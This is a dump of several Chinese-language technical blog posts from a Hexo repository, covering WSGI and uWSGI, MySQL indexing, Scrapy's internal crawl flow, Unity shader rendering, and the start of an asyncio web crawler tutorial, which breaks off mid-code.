"blob_id": "5094e2c1df29f1db4d905286329f96f329315faf",
"content_id": "a1edcccaca97c7e19d7ea3bd53678f39d94f7151",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1855,
"license_type": "no_license",
"max_line_length": 235,
"num_lines": 30,
"path": "/source/_posts/python-web.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: Python Web流程\ndate: 2018-02-08 20:40:41\ncategories: Python\ntags: [Python,Web]\n---\n\n### 流程上大概分三层:\n 1. web服务器层\n a. 主要包括Nginx、Apache等\n 2. WSGI层\n a. Web Server Gateway Interface,定义了 web服务器和 web应用之间的接口规范\n 3. web 应用层\n a. 主要包括Flash、Django等\n\n\n### 几个相关概念:\n**CGI(Common Gateway Inteface)**:外部应用程序与Web服务器之间的接口标准\n\n**FastCGI**: CGI的一个扩展, 提升了性能,废除了 CGI fork-and-execute (来一个请求 fork 一个新进程处理,处理完再把进程 kill 掉)的工作方式,转而使用一种长生存期的方法,减少了进程消耗,提升了性能。\n\n**WSGI(Python Web Server GateWay Interface)**:它是用在 python web 框架编写的应用程序与后端服务器之间的规范(本例就是 Django 和 uWSGI 之间),让你写的应用程序可以与后端服务器顺利通信。在 WSGI 出现之前你不得不专门为某个后端服务器而写特定的 API,并且无法更换后端服务器,而 WSGI 就是一种统一规范, 所有使用 WSGI 的服务器都可以运行使用 WSGI 规范的 web 框架,反之亦然。\n\n**uWSGI**: 是一个Web服务器,它实现了WSGI协议、uwsgi、http等协议。用于接收前端服务器转发的动态请求并处理后发给 web 应用程序。\n\n**uwsgi**: 是uWSGI服务器实现的独有的协议, 网上没有明确的说明这个协议是用在哪里的,我个人认为它是用于前端服务器与 uWSGI 的通信规范,相当于 FastCGI的作用。\n - WSGI看过前面小节的同学很清楚了,是一种通信协议。\n - uwsgi同WSGI一样是一种通信协议。\n - 而uWSGI是实现了uwsgi和WSGI两种协议的Web服务器。\n"
},
{
"alpha_fraction": 0.7647058963775635,
"alphanum_fraction": 0.7843137383460999,
"avg_line_length": 25.179487228393555,
"blob_id": "940e5cdb620706b9979930cd3a7c498b9583250c",
"content_id": "34d4aa93557a092edb623c6aab289f72ac77c11f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2328,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 39,
"path": "/source/_posts/MySQL索引补充.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: MySQL单列索引和多列索引\ndate: 2018-01-31 11:53:50\ncategories: MySQL\ntags: [MySQL,多列索引,单列索引]\n---\n在设计MySql表索引的时候,可能有个问题,就是多个单列索引好,还是设计为多列索引好;下面从不同角度分析下这个问题;\n** 1.多个单列索引:**\n定义:即是在表中在需要索引的字段上为每个字段设计一个索引;\n特点:简单,索引个数多\n\n** 2.多列索引:**\n定义:即是在表中根据查询需求在多个字段上设计一个索引;\n特点:稍微复杂,需要考虑索引顺序;\n\n** 3.性能上的对比 **\n- 多个单列索引的情况下,MySql在执行查询时,如果where条件中是使用and连接各种过滤条件的,那么MySql会选择其中一个限制最严格的索引(区分度最高的)。\n- 多列联合索引中由于索引是考虑索引字段顺序的,根据InnoDB中B-Tree的实现原理,单个索引限制再严格也没有多列限制严格,所以在多列索引的情况下数据库扫描更少的行,可以在较短的时间内返回数据;\n\n** 4.判断依据 ** \n主要使用MySql的查询计划来判断执行器在查询数据的时候到底使用哪个索引,主要的依据是根据执行计划的Extra字段,下面是Extra在不同情况下代表的使用不同类型的索引\nExtra:\n - Using index:直接使用索引,覆盖索引的情况,可以通过索引直接返回所需数据。\n - Using indexc ondition:使用索引,但需要回表查询相关数据\n\n** 5.覆盖索引 ** \n定义:查询所需数据通过索引可以直接获取到,不需要回表查询数据行;\n - Select查询返回列包含在索引列中\n - where条件包含索引列或复合索引的前导列\n - 查询结果的总字段长度可以接受\n\n** 6.索引合并 ** \n在索引设计不太合理的时候,MySql可能会对一些查询执行索引合并\n - 在多个单列索引的情况下,\n + where条件的索引列使用or连接时,会触发索引合并\n + where条件的索引列使用and连接时,通常会选择限制最严格的索引,这个时候联合索引(多列索引)比较合适\n - 合并标识\n + 使用 explain 可看到 type:index_merge\n - 触发索引合并,说明当前索引设计的比较糟糕"
},
{
"alpha_fraction": 0.6338438391685486,
"alphanum_fraction": 0.6366479992866516,
"avg_line_length": 43.157142639160156,
"blob_id": "5f2f58ab27eda24c1bf2c8b708ffc46c7ab81766",
"content_id": "98634861db3312b34cb5497b8e75901a44a4fcfe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 10772,
"license_type": "no_license",
"max_line_length": 226,
"num_lines": 210,
"path": "/source/_posts/scrapy-flow.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: Scrapy整体抓取流程\ndate: 2018-06-06 21:36:01\ncategories: 源码研究 #文章文类\ntags: [Scrapy,源码,python] #文章标签,多于一项时用这种格式\n---\n\n看代码过程中整理的一张思维导图,对理解整个流程有帮助。\n\n\n从启动示例说起:\n```\n\timport scrapy\n\tfrom scrapy.crawler import CrawlerProcess\n\n\tclass MySpider1(scrapy.Spider):\n\t # Your first spider definition\n\t ...\n\n\tclass MySpider2(scrapy.Spider):\n\t # Your second spider definition\n\t ...\n\n\tprocess = CrawlerProcess()\n\tprocess.crawl(MySpider1)\n\tprocess.crawl(MySpider2)\n\tprocess.start() # the script will block here until all crawling jobs are finished\n```\n\n这是官方推荐的在一个进程启动多个Spider的示例;先实例化一个CrawlerProcess实例,这个就是一个Scrapy进程,接着添加两个Spider,并且启动进程,看起来很简单,下面结合源代码分析Scrapy是怎么完成抓取的。\n\nCrawlerProcess继承自CrawlerRunner,上面示例中CrawlerProcess实例化后,调用crawl方法添加Spider,看看具体代码执行了什么?\n```\n def crawl(self, crawler_or_spidercls, *args, **kwargs):\n crawler = self.create_crawler(crawler_or_spidercls)\n return self._crawl(crawler, *args, **kwargs)\n def _crawl(self, crawler, *args, **kwargs):\n self.crawlers.add(crawler)\n d = crawler.crawl(*args, **kwargs)\n self._active.add(d)\n def _done(result):\n self.crawlers.discard(crawler)\n self._active.discard(d)\n return result\n return d.addBoth(_done)\n```\n可以看出这里是用参数Spider创建了个crawler,并且调用crawler的crawl方面。顺藤摸瓜看看Crawler.crawl()方法到底干了什么?\n```\n @defer.inlineCallbacks\n def crawl(self, *args, **kwargs):\n assert not self.crawling, \"Crawling already taking place\"\n self.crawling = True\n try:\n self.spider = self._create_spider(*args, **kwargs)\n self.engine = self._create_engine()\n start_requests = iter(self.spider.start_requests())\n yield self.engine.open_spider(self.spider, start_requests)\n yield defer.maybeDeferred(self.engine.start)\n except Exception:\n if six.PY2:\n exc_info = sys.exc_info()\n self.crawling = False\n if self.engine is not None:\n yield self.engine.close()\n if six.PY2:\n six.reraise(*exc_info)\n raise\n```\n这里创建Spider,创建engine。接着调用engine.open_spider(),engine.start(),这个流程先打住,待会回过头来再接下来分析这里。先看下示例代码最后一步process.start()。\n```\n def start(self, stop_after_crawl=True):\n if stop_after_crawl:\n d = self.join()\n # Don't start the reactor if the deferreds are already fired\n if d.called:\n return\n d.addBoth(self._stop_reactor)\n reactor.installResolver(self._get_dns_resolver())\n tp = reactor.getThreadPool()\n tp.adjustPoolsize(maxthreads=self.settings.getint('REACTOR_THREADPOOL_MAXSIZE'))\n reactor.addSystemEventTrigger('before', 'shutdown', self.stop)\n reactor.run(installSignalHandlers=False) # blocking call\n```\n这里引入了Twisted的事件循环并启动,之后上面的engine会注册相关的方法到事件循环中执行。接着上面engine分析。看看open_spider()干了什么?start()很简单,这里不介绍。\n```\n @defer.inlineCallbacks\n def open_spider(self, spider, start_requests=(), close_if_idle=True):\n assert self.has_capacity(), \"No free spider slot when opening %r\" % \\\n spider.name\n logger.info(\"Spider opened\", extra={'spider': spider})\n nextcall = CallLaterOnce(self._next_request, spider)\n scheduler = self.scheduler_cls.from_crawler(self.crawler)\n start_requests = yield self.scraper.spidermw.process_start_requests(start_requests, spider)\n slot = Slot(start_requests, close_if_idle, nextcall, scheduler)\n self.slot = slot\n self.spider = spider\n yield scheduler.open(spider)\n yield self.scraper.open_spider(spider)\n self.crawler.stats.open_spider(spider)\n yield self.signals.send_catch_log_deferred(signals.spider_opened, spider=spider)\n slot.nextcall.schedule()\n slot.heartbeat.start(5)\n```\n这里创建调度器Scheduler,并调用Spider中间件管理器注册的中间件的process_start_requests对start_requests做相应处理。重点是nextcall,这个就是向上面主流程中的事件循环中注册事件的。从中可以看出把_next_request方法注册到时间循环,并且没5秒钟执行一次。并且这个nextcall也是可以主动调度的。\n\n接着分析engine._next_request()的实现:\n\n```\n\tdef _next_request_from_scheduler(self, spider):\n slot = self.slot\n request = slot.scheduler.next_request()\n if not request:\n return\n d = self._download(request, spider)\n d.addBoth(self._handle_downloader_output, request, spider)\n d.addErrback(lambda f: logger.info('Error while handling downloader output',\n exc_info=failure_to_exc_info(f),\n extra={'spider': spider}))\n d.addBoth(lambda _: slot.remove_request(request))\n d.addErrback(lambda f: logger.info('Error while removing request from slot',\n exc_info=failure_to_exc_info(f),\n extra={'spider': spider}))\n d.addBoth(lambda _: slot.nextcall.schedule())\n d.addErrback(lambda f: logger.info('Error while scheduling new request',\n exc_info=failure_to_exc_info(f),\n extra={'spider': spider}))\n return d\n```\n先从调度器中获取一个请求,执行下载,这中间要经过下载中间件层层过滤。接着注册回调函数_handle_downloader_output方法处理下载后的结果。\n看看_handle_downloader_output做了什么:\n```\n\tdef _handle_downloader_output(self, response, request, spider):\n assert isinstance(response, (Request, Response, Failure)), response\n if isinstance(response, Request):\n self.crawl(response, spider)\n return\n # response is a Response or Failure\n d = self.scraper.enqueue_scrape(response, request, spider)\n d.addErrback(lambda f: logger.error('Error while enqueuing downloader output',\n exc_info=failure_to_exc_info(f),\n extra={'spider': spider}))\n return d\n```\n如果返回结果是Request类型,需要重新调用crawl()方法,具体做法是,先交给调度器调度。如果返回类型是Response或者Failure,则交给scraper处理。接着看看enqueue_scrape()干了啥?\n```\n\tdef enqueue_scrape(self, response, request, spider):\n slot = self.slot\n dfd = slot.add_response_request(response, request)\n def finish_scraping(_):\n slot.finish_response(response, request)\n self._check_if_closing(spider, slot)\n self._scrape_next(spider, slot)\n return _\n dfd.addBoth(finish_scraping)\n dfd.addErrback(\n lambda f: logger.error('Scraper bug processing %(request)s',\n {'request': request},\n exc_info=failure_to_exc_info(f),\n extra={'spider': spider}))\n self._scrape_next(spider, slot)\n return dfd\n```\n在scraper内部也会维护一个队列,其中add_response_request就是队列的producer,往队列里放任务,_scrape_next则是队列consumer,消费队列的任务。看看如何消费?\n```\n\tdef _scrape(self, response, request, spider):\n \"\"\"Handle the downloaded response or failure through the spider\n callback/errback\"\"\"\n assert isinstance(response, (Response, Failure))\n\n dfd = self._scrape2(response, request, spider) # returns spiders processed output\n dfd.addErrback(self.handle_spider_error, request, response, spider)\n dfd.addCallback(self.handle_spider_output, request, response, spider)\n return dfd\n\tdef _scrape2(self, request_result, request, spider):\n if not isinstance(request_result, Failure):\n return self.spidermw.scrape_response(\n self.call_spider, request_result, request, spider)\n else:\n # FIXME: don't ignore errors in spider middleware\n dfd = self.call_spider(request_result, request, spider)\n return dfd.addErrback(\n self._log_download_errors, request_result, request, spider)\n```\n如果是Response类型,在执行Spider中间件的scrape_response方法,并注册Spider结果处理函数handle_spider_output();看看handle_spider_output干了些什么?\n```\n\tdef handle_spider_output(self, result, request, response, spider):\n if not result:\n return defer_succeed(None)\n it = iter_errback(result, self.handle_spider_error, request, response, spider)\n dfd = parallel(it, self.concurrent_items,\n self._process_spidermw_output, request, response, spider)\n return dfd\n\tdef _process_spidermw_output(self, output, request, response, spider):\n if isinstance(output, Request):\n self.crawler.engine.crawl(request=output, spider=spider)\n elif isinstance(output, (BaseItem, dict)):\n self.slot.itemproc_size += 1\n dfd = self.itemproc.process_item(output, spider)\n dfd.addBoth(self._itemproc_finished, output, response, spider)\n return dfd\n elif output is None:\n pass\n else:\n typename = type(output).__name__\n logger.error('Spider must return Request, BaseItem, dict or None, '\n 'got %(typename)r in %(request)s',\n {'request': request, 'typename': typename},\n extra={'spider': spider})\n```\n首先在deffer中注册_process_spidermw_output方法,在_process_spidermw_output的处理中,如果接收到的结果是Request,就通知engine抓取此请求。如果接收到的是BaseItem或者dict类型的数据,则调用配置的itempipeline的process_item方法,这里往往是数据存DB或者写文件中,到此整理流程也就完成了。这只是正常流程的大概描述,中间还有很多异常处理和状态监控、log等等。"
},
{
"alpha_fraction": 0.6354044675827026,
"alphanum_fraction": 0.6752637624740601,
"avg_line_length": 18.409090042114258,
"blob_id": "dd2fe29ec0f2b88cc05e34359501881758d4ed81",
"content_id": "749b128d711f77165a0d8db6b76d4f8d13d56d7f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1785,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 44,
"path": "/source/_posts/MySql索引.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: MySql索引\ndate: 2018-01-23 18:01:52\ncategories: MySQL\ntags: [MySQL,B-Tree]\n---\n## MySql索引分类:\n### 1)B-Tree\n** 缺点: **\n 1. 只能索引列最左边开始\n 2. 不能跳过索引中的列\n 3. 不能优化访问任何在第一个范围条件右边的列\n\n### 2)哈希索引\n只对精确查找有用\n** 缺点: **\n 1. 不能进行排序\n 2. 不支持部分键匹配\n 3. 只支持=, in(), <=>相等比较\n \n### 3)空间数据索引(R-Tree)\n和B-Tree不同,这类索引无须前缀查询。空间索引会从所有维度来索引数据。查询时,可以任意维度组合查询。\n\n## 索引优点\n 1. 减少服务器需要扫描的数据量\n 2. 帮助服务器避免排序和临时表\n 3. 将随机I/O变为顺序I/O\n\n## 使用索引策略\n 1. 独立列\n a. 不能是表达式的一部分,也不能是函数的参数\n 2. 保证较高的前缀索引选择性\n 3. 多列索引\n a. 在多个列上创建独立的单列索引大部分情况下并不能提高MySql的查询性能\n b. 但在MySql5.0和更高版本的MySql中可以使用“索引合并”策略优化查询,使其使用单列索引;但也说明这是一个糟糕的索引设计;\n 4. 选择合适的索引列顺序\n a. 不考虑排序和分组时将选择性高的列放到索引的最前列\n 5. 聚簇索引\n a. InnoDB中支持主键聚集数据,也就是被索引的类就是主键列;\n b. 如果没有定义主键,InnoDB选择一个唯一非空索引代替。\n c. 最好避免随机主键聚簇索引,自增主键索引最好;\n d. 顺序主键在高并发的情况下会有热点问题;\n 6. 覆盖索引\n a. 索引中包含所有需要查询的字段,就不需要读取数据行,称为覆盖索引"
},
{
"alpha_fraction": 0.662372350692749,
"alphanum_fraction": 0.6816967725753784,
"avg_line_length": 19.082019805908203,
"blob_id": "0e98d25a353f8a32f87cfdab4ffd3c7f70d29aa5",
"content_id": "c654ad7818202a7c426c0288ec961924ee3ed591",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 11849,
"license_type": "no_license",
"max_line_length": 199,
"num_lines": 317,
"path": "/source/_posts/shader.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: Shader渲染流水线\ndate: 2017-03-29 14:43:43\ncategories: Unity #文章文类\ntags: [unity,shader,渲染流水线,光照模型]\n---\n\nGPU流水线上可高度编程的阶段,包括表面着色器、顶点片元着色器、固定管线着色器。目前的Unity5中,本质上只有顶点片元着色器\n\n#### 关于渲染流水线:\n\n主要任务:从一个三维场景,渲染出一张二维图像,主要由CPU & GPU协作完成。\n渲染流程三个阶段:应用阶段 | 几何阶段 | 光栅化阶段\n\n\n\n* 应用阶段:根据三维场景输出渲染所需要的几何信息(图元:点、线、三角面等)\n\n \t三个步骤:\n\n 1)数据加载到显存。\n\n 2)设置渲染状态(使用哪个着色函数、光源属性等)。\n\n 3)调用Draw Call(CPU向GPU发起渲染指令)\n\n* 几何阶段:主要任务是把几何顶点坐标转换到屏幕空间中,然后交个光栅器处理\n\n* 光栅化阶段:使用上阶段的数据产生屏幕像素,渲染成像。\n\n两个主要任务:\n\n* 计算每个图元覆盖了哪些像素\n\n* 计算这些像素颜色\n\n#### Draw Call(GPU流水线):【几何阶段 & 光栅化阶段】\n\n\n* 顶点着色器:主要实现顶点空间变换(坐标变换)、可实现定点着色(光照计算)等,基本任务把顶点位置坐标从模型空间转换到裁剪空间\n\n* 曲面细分着色器:可选,细分图元,需要显卡支持。使模型看起来更细腻\n\n* 裁剪:不在摄像机视野内的物体在此阶段被裁剪掉\n\n* 屏幕映射:坐标转换(三维->二维),但需要记录下坐标深度、法线方向、视角方向等,跟用于显示的屏幕分辨率有关。\n\n* 三角形设置:计算三角网格表示数据的过程,为计算三角面覆盖的像素准备数据\n\n* 三角形遍历:检查每个像素是否被一个三角网格覆盖并生成图元。输出片元序列\n\n* 片元着色器:输入,顶点着色器输出数据的插值。输出,一个或多个颜色值。纹理采样\n\n* 逐片元操作:片元-->模板测试-->深度测试-->混合-->颜色缓冲\n\n```\nOpenGL & DirectX :图像应用编程接口,用于渲染二维、三维图像。位于上层应用和GPU之间,应用程序通过这些编程接口发送渲染指令,由图像应用编程接口向显卡发送渲染指令\n```\n\n\n** 着色器语言:**\n\n1)Direct X的HLSL(High Level Shading Language)\n\n2)OpenGL的GLSL\n\n3)NVIDIA的CG\n\n4)Unity使用的是ShaderLab\n\n#### 重要的数学基础:\n\n** 1)矢量点积 **\n\n 几何意义:投影\n\n\n\na \\* b = |a| \\* |b| \\* cosQ ** b在a上的投影 ** \n\n2)矢量叉积\n\n几何意义:a X b得到同时垂直于a&b的新矢量\n\n用途:计算垂直于一个平面、三角形的矢量。判断三角面的朝向\n\n3)矩阵\n\n几何意义:坐标变换(平移、缩放、旋转等,分别对应一变换矩阵)\n\n用途:坐标空间变换\n\n4)坐标空间\n\n\n\n\n### ShaderLab语法\n基本结构:\n\n```\nShader \"Custom Shaders/Simple Shader\" {\n Properties {\n // 声明一个材质面板上的颜色拾取器\n\t_Color (\"Color Tint\", Color) = (1, 1, 1, 1)\n }\n SubShader {\n Pass {\n // CG代码开始\n CGPROGRAM\n // 声明顶点着色函数\n #pragma vertex vert\n // 声明片元着色函数\n #pragma fragment frag\n // 在CG程序中需要声明一个属性名称和类型都匹配的变量\n uniform fixed4 _Color;\n\t struct a2v {\n // POSITION语义告诉Unity,用模型的顶点坐标填充vertex参数\n float4 vertex : POSITION;\n // NORMAL语义告诉Unity,用模型空间的法线方向填充normal参数\n\t\tfloat3 normal : NORMAL;\n // TEXCOORD0语义,告诉unity,用模型的第一套纹理坐标填充texcoord参数\n\t\tfloat4 texcoord : TEXCOORD0;\n };\n \n // 使用v2f结构体定义顶点着色器的输出\n struct v2f {\n // SV_POSITION语义告诉Unity,pos里包含了顶点在裁剪空间中的位置\n float4 pos : SV_POSITION;\n // COLOR0语义,用于存储颜色信息\n fixed3 color : COLOR0;\n };\n \n v2f vert(a2v v) {\n // 声明输出结构\n \tv2f o;\n \to.pos = mul(UNITY_MATRIX_MVP, v.vertex);\n // v.normal保存了顶点的法线方向,分量范围[-1.0, 1.0],先将其映射到[0.0, 1.0],存到o.color传递给片元着色器\n \to.color = v.normal * 0.5 + fixed3(0.5, 0.5, 0.5);\n return o;\n }\n fixed4 frag(v2f i) : SV_Target {// SV_Target告诉渲染器,把用户的输出颜色存储到一个渲染目标中\n \tfixed3 c = i.color;\n \tc *= _Color.rgb;\n // 将插值后的值显示到屏幕上\n return fixed4(c, 1.0);\n }\n ENDCG\n }\n }\n FallBack \"Diffuse\"\n}\n```\n\nCG中的语义:\n\n\n\n\n\n### 基本光照&光照模型:\n* 环境光:通常是一个全局变量\n\n* 自发光:\n\n* 漫反射(兰伯特光照模型):\n\n* 高光(镜面)反射(Phong光照模型):\n### 光照模型:\n* Lambert模型:用来描述漫反射\n```\n计算公式:Cdiffuse = (Clight * Mdiffuse ) Max(0, n * I)\n\nn:表面法线;I:指向光源的单位矢量;Mdiffuse:材质的漫反射颜色;Clight:光源颜色\n```\n\n* Phong模型:模拟高光,可让物体表现出光斑\n计算公式:\n```\nmgloss:是材质光泽度,mspecular:材质的高光反射颜色,Clight:光源颜色,v:视角方向,r:反射方向\n```\n\n* Blinn-Phong模型:基本原理同Phone,提高了运算效率;目前游戏上较流行的模型\n\n* PBR:基于物理的渲染;使用BRDF(双向反射率分布方程):主要描述了光线作用到物体表面后的反射(高光反射Specular)和散射(漫反射Diffuse)\n\n### 光照计算:\n* 1)逐像素光照:\n\n 以每个像素为基础,得到他们的法线(对顶点法线插值得到,或从法线纹理采样得到),然后进行光照计算。\n\n* 2)逐顶点光照\n\n 在每个顶点上计算光照,然后在渲染图元内部进行线型插值,最后输出成像素颜色。\n\n 由于顶点数目往往小于像素数目,所以逐顶点光照计算量少些\n\n### 纹理:\n* 漫反射纹理(漫反射贴图)\n\n* 凹凸纹理(法线贴图、Heightmap)\n\n* 渐变纹理\n\n### 透明效果:\n两种实现方式:1)透明度测试 2)透明度混合\n\n* 透明度测试:不能实现真正的半透明,不需要关闭深度写入,实际上是根据透明度舍弃一些图元,所以他实现的效果要么完全透明,要么不透明。\n\n* 透明度混合:可以实现真正的半透明,使用当前片元的透明度作为混合因子,与颜色缓存区中的颜色进行混合,得到新的颜色存入颜色缓存区中。需要关闭深度写入,深度缓存是只读的。\n\n* 透明度混合方式关闭深度写入的原因:深度缓存区的剔除机制。\n\n### 渲染顺序问题:\n从距离摄像机由远及近依次渲染。\n\n不考虑透明物体的情况下,unity使用深度缓冲区(z-buffer)的方式,使我们不用关心场景中物体的渲染顺序。\n\nz-buffer基本思想:根据深度缓冲中的值判断该图片距离摄像机的距离,当渲染一个图元时,需要把他的深度值跟已经存到z-buffer中的值比较,如果距离摄像机更近,则这个片元覆盖掉z-buffer中的值,深度值写入z-buffer中。\n\n### Unity Shader的渲染顺序:\n\n采用渲染队列的方式解决:\n\n\n```\n// 透明度测试\nSubShader {\n\tTags {\"Queue\": \"AlphaTest\"}\n\tPass {\n\t\t...\n\t}\n}\n// 透明度混合\nSubShader {\n\tTags {\"Queue\": \"Transparent\"}\n\tPass {\n\t\tZWrite Off\n\t\t...\n\t}\n}\n```\n\n### Unity 渲染路径\n\n\n### Unity Standard Sharder\n\n\n** 1、Rendering Mode ** \n\nRendering Mode:在非透明和多种透明效果之间切换。\n\nOpaque:默认,实体渲染。\n\nCutout:Alpha test,通过贴图的Alpha值缕空模型表面。\n\nTransparent:透明效果,如玻璃,半透明塑料等等。\n\nFade:在这个模式下,一个对象可以实现淡入淡出效果。\n\n参考:https://docs.unity3d.com/Manual/StandardShaderMaterialParameterRenderingMode.html\n\n** 2、Albedo ** \n\nAlbedo是一个只拥有颜色信息的“平面”贴图,即不带任何AO,SHADOW等光影信息。是物体的Base Color颜色值。\n\n** 3、Metallic & Specluar & Smoothness ** \n\nSpecular通过直接赋与颜色的方式来决定高光反射强度。Metallic则通过一个0~1的值,来决定金属的反射强度。\n\n不管是在metallic还是Specular模式下,一但使用了贴图来决定高光反射效果。引擎将会采用贴图中的值,设置的Metallic因子,或者Specular Color均会无效。\n\nSmoothness则决定了一个物体的光滑呈度。 即使一个物体表面高光很强烈。若它是一个不光滑的物体,那么其反射会呈不规则的方向分布,光会分散到不同的地方。那么到达人眼中的反射光就会少。整体的反射效果就会变得很弱。(注:当Metallic或者Specular被赋与贴图后。Smoothness值会失效。 转而采用Matallic或者Specular贴中的Alpha通道作为Smoothness值。)\n\n\n** 4、Normal Map ** \n\nNormal Map是Bump Mapping的一种特例化。 它主要是通过贴图为光照计算时提供更细节的法线信息。使物体表面具有高度的细节效果。如下图所示\n\n\n** 5、Heightmap ** \n\nHeightmap比NormalMap更上一层楼,NormalMap是通过赋与物体表面更多的法线信息,来造成光照上的细节增强。 Normal Map有一个缺点就是,当视线与表面平行时,就失去法线效果。而Heightmap则直接对某些顶点进行位移。由此也可以看出来,Heightmap的效率开销会比Normalmap高,要更据情况选择使用。\n\n高度图是一张灰度图,白色表示突出,黑色表示凹陷。\n\n\n** 6、Occlusion Map **\n\nOcclusion Map用于决定一个模型各部位受到间隔光照的影响情况。 间隔光照一般来自于Ambient和环境反射。\n\n\n** 7、Emission **\n\nEmission表示一个物体的自发光程度。默认是纯黑,如果为这个物体赋值了非黑色的材质。 那么这个物体即使在黑暗的场景下,也会有亮光。\n\n** 8、Detail Mask & Secondary Maps **\n\nSecondary Maps用于在物体的表面增加细节。我们可以为一个物体再赋值一套Albedo和NormalMap. 第一套Albedo和第二套Albedo是叠加的。\n\n\n参考:https://docs.unity3d.com/Manual/StandardShaderMaterialParameterDetail.html\n\n** 9、Fresnel **\n\nFresnel菲涅尔效果。物体的表面与视线的夹角的不同,会导致眼睛看到的从物体反射出来的光线的反射量不同。\n\nStandard Shader通过Smoothness间接控制菲涅尔反射效果\n\n参考:http://docs.unity3d.com/Manual/StandardShaderFresnel.html\n\nPBR官方参考使用样例:\n\nhttps://blogs.unity3d.com/2015/02/18/working-with-physically-based-shading-a-practical-approach/\n\n"
},
{
"alpha_fraction": 0.7286129593849182,
"alphanum_fraction": 0.7391585111618042,
"avg_line_length": 31.83745574951172,
"blob_id": "7e5dab5898984b321d300ea2c098d6447a463d36",
"content_id": "704116f55a9cdcc0d505f7fe729bef1a111ff104",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 16561,
"license_type": "no_license",
"max_line_length": 238,
"num_lines": 283,
"path": "/source/_posts/500-async-crawler.md",
"repo_name": "polarisary/hexoblog",
"src_encoding": "UTF-8",
"text": "---\ntitle: 500-async-crawler\ndate: 2018-12-13 20:17:05\ncategories: 500 Lines or Less\ntags: [asyncio,python,crawler]\n---\n\n# 原文&作者:\n\n[A Web Crawler With asyncio Coroutines](http://aosabook.org/en/500L/a-web-crawler-with-asyncio-coroutines.html)\n\n- A. Jesse Jiryu Davis\n\n> A. Jesse Jiryu Davis是纽约MongoDB的高级工程师,负责MongoDB的异步Python驱动,也是MongoDB C驱动的主程,同时也是PyMongo团队的一员。并且在 asyncio和Tornado上都所有贡献。他的个人博客地址是:http://emptysqua.re\n\n\n- Guido van Rossum\n\n> Guido van Rossum是Python之父,Python社区称他为BDFL,博客地址:http://www.python.org/~guido/\n\n# 简介\n传统的计算机科学,强调高效算法、整个计算越快越好。但很多网络程序耗时并不在计算上,而是保持很多慢连接,或者很少的事件上。这些程序面临一个完全不一样的挑战:需要等待大量的有效网络事件。当前解决的方法是使用异步IO\n\n本章介绍一个简单的网络爬虫,这是一个原生的异步应用程序,因为它等待很多网络请求返回,但计算量很少。每次请求的网页数越多,完成的越快。如果每个请求一个线程,随着并发请求的增加,将会耗尽内存或者跟线程相关的资源。使用异步I/O可以避免线程的弊端。\n\n我们将分三个阶段来完成这个爬虫。首先,我们简单介绍下异步事件循环,使用事件循环和回调来实现一个简单的爬虫。这种方式非常高效,但扩展到较复杂的问题上将陷入回调陷阱。接下来,我们介绍高效并且可扩展的Python协程,我们使用生成器来实现简单的协程。最后,我们将使用Python标准库asyncio,并配合异步队列来实现爬虫\n\n# 任务\n\n网络爬虫在网络上寻找并下载网页,之后归档或者索引下载下来的网页。从一个根url开始,下载、解析网页中的链接地址,未抓取过的添加到队列继续抓取,直到抓取的网页上的链接地址都抓取过了,并且队列为空爬虫停止。\n\n我们可以同时下载多个网页来加速爬虫。当爬虫获取到新的链接时,在独立的socket上触发相同的抓取操作,解析相应,并将新的链接地址放入队列中。但可能会因为并发太多而造成性能下降,所以,我们需要限制并发请求数。\n\n# 传统的方法\n\n怎样让爬虫并发起来呢?传统的方式是使用线程池。每个线程每次负责下载一个网页。例如下面的程序,从xkcd.com下载网页:\n```\ndef fetch(url):\n sock = socket.socket()\n sock.connect(('xkcd.com', 80))\n request = 'GET {} HTTP/1.0\\r\\nHost: xkcd.com\\r\\n\\r\\n'.format(url)\n sock.send(request.encode('ascii'))\n response = b''\n chunk = sock.recv(4096)\n while chunk:\n response += chunk\n chunk = sock.recv(4096)\n\n # Page is now downloaded.\n links = parse_links(response)\n q.add(links)\n```\nsocket默认是阻塞的(当线程调用connect、recv等方法,程序将等待方法返回)。所以要同时下载多个网页,需要多线程。复杂的应用程序将使用线程池来减少线程频繁创建的开销,重复利用空闲的线程。在socket上的连接池也是同样的道理。\n\n并且,线程开销比较大,操作系统对用户或者机器的线程数是有明确限制的。Jesse的操作系统,Python线程占用50k内存,如果开启成千上万的线程将使系统崩溃。如果我们同时启动成千上万的下载操作在socket上,结果是在socket耗尽之前,线程所占资源将首先到达瓶颈。\n\n著名的 \"C10K问题\",Dan Kegel 列出了多线程并发的限制。他这样说:\n>\n> It's time for web servers to handle ten thousand clients simultaneously, don't you think? After all, the web is a big place now.\n\nKegel在1999年提出“C10K”,现在看来并发1万不是什么特别困难的问题,但是这个问题仅仅在并发数量上改变了,本质上来说,没有改变。在当时,一个线程处理处理一个连接解决1万并发是不切实际的。现在应该解决并发数量上高一个量级了。的确,我们的网络爬虫可以使用线程实现。但是,大规模的应用,成千上万的并发连接,c10k问题还是存在的,即使socket没有超过大多数操作系统限制,线程也耗尽了。怎么解决这个问题呢?\n\n# 异步\n异步I/O使用非阻塞的套接字,在单线程下实现并发操作。我们的异步爬虫,我们将使用非阻塞套接字:\n```\nsock = socket.socket()\nsock.setblocking(False)\ntry:\n sock.connect(('xkcd.com', 80))\nexcept BlockingIOError:\n 